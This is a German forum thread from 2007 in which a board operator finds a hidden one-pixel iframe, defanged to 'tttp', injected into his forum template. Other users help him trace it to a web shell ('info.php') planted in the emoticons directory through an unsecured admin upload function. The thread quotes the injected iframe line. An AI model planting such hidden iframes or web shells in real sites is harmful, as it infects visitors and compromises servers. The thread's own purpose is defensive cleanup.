gonzo 0 Report post Posted March 16, 2007 Hallo meine Lieben , <iframe src="tttp://surka.info/index.php?adv=17" width=1 height=1></iframe> Diesen Eintrag mußte ich im Wrapper sehen, nachdem ich Beschwerden bekam, dass mein Board mit einem Virus infiziert ist ---> JS/Downloader-AUD (Trojanisches Pferd) Ich habe die Adresse vorsichtshalber für euch hier mit tttp verändert, damit sich keiner nen Virus einfängt. Wie kam das Drecksteil da rein ?? Meine Boardadresse: http://www.libriamici.de So sah es genau aus: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <iframe src="tttp://surka.info/index.php?adv=17" width=1 height=1></iframe> <title><% TITLE %></title> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" lang="de"> <meta name="description" content="Buchforum und Literaturforum"> <meta name="author" content="Baur Jürgen"> <meta name="robots" content="index, follow"> <meta name="keywords" content="libriamici forum, Forum, forum, und weiter unten vor dem Bodyteil nochmal. Share this post Link to post
Modula 0 Report post Posted March 17, 2007 1. Hast du alle aktuellen Sicherheitsupdates drin? 2. Ist dein Passwort sicher? 3. ggf. ne root Shell im /html/emoticons Verzeichnis gelandet? Share this post Link to post
gonzo 0 Report post Posted March 17, 2007 1. Hast du alle aktuellen Sicherheitsupdates drin? 2. Ist dein Passwort sicher? 3. ggf. ne root Shell im /html/emoticons Verzeichnis gelandet? Hi Modula, danke für das Feedback. 1. Nein - ich dachte 1.3 wird nicht mehr supported (wo kann ich die Dinger downloaden?) 2. Ja / Zahlen Buchstabenkombination > 8 Zeichen 3. Erkläre mir das bitte genauer, ist das emoticons verzeichnis ne Schwachstelle? Share this post Link to post
Modula 0 Report post Posted March 19, 2007 Ja, das emoticons Verzeichnis ist eine Schwachstelle durch eine ungesicherte Uploadfunktion in der IPB Administration. Sollten noch Fragen offen sein, meld dich einfach noch mal :) Share this post Link to post
gonzo 0 Report post Posted April 2, 2007 DANKE AN EUCH!! JA, es ist eine RootShell im Emoticons Verzeichnis gelandet! Boa, hab jetzt einfach die Berechtigungen des Verzeichnisses geändert und die "info.php" -> so hat sich die Shell genannt gelöscht. Share this post Link to post